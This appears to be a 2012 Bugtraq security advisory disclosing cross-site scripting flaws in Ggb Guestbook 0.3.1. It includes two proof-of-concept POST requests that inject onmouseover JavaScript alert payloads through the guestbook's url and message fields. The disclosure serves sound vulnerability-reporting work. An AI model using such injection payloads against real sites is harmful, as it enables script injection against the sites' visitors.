[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201201051344.q05Dit2p028655@sf01web3.securityfocus.com>
Date: Thu, 5 Jan 2012 13:44:55 GMT
From: demonalex@....com
To: bugtraq@...urityfocus.com
Subject: Ggb Guestbook - XSS Vulnerabilities
Title: Ggb Guestbook - XSS Vulnerabilities
Software : Ggb Guestbook
Software Version : 0.3.1
Vendor: http://gelin.ru/soft/project/ggb/
http://code.google.com/p/ggbook/
Vulnerability Published : 2012-01-05
Vulnerability Update Time :
Status :
Impact : Medium
Bug Description :
Ggb Guestbook(version update : 0.3.1) is vulnerable to XSS.
Proof Of Concept :
1)url in action/add-submit.php , PoC:
POST http://127.0.0.1/ggb/?action=add-submit
-------------------------------------------------
name=demonalex&email=&url=%22+onmouseover%3D%22javascript%3Aalert%28%27demonalex%27%29%3B%22%3E&message=demonalex
2)message in action/add-submit.php , PoC:
POST http://192.168.10.211/ggb/?action=add-submit
-------------------------------------------------
name=aaa&email=&url=bbb&message=%3Cimg+src%3D%22aaa.jpg%22+onmouseover%3D%22javascript%3Aalert%28%27demonalex%27%29%3B%22%3E
Credits : This vulnerability was discovered by demonalex(at)163(dot)com
mail: demonalex(at)163(dot)com / ChaoYi.Huang@...nect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK
Powered by blists - more mailing lists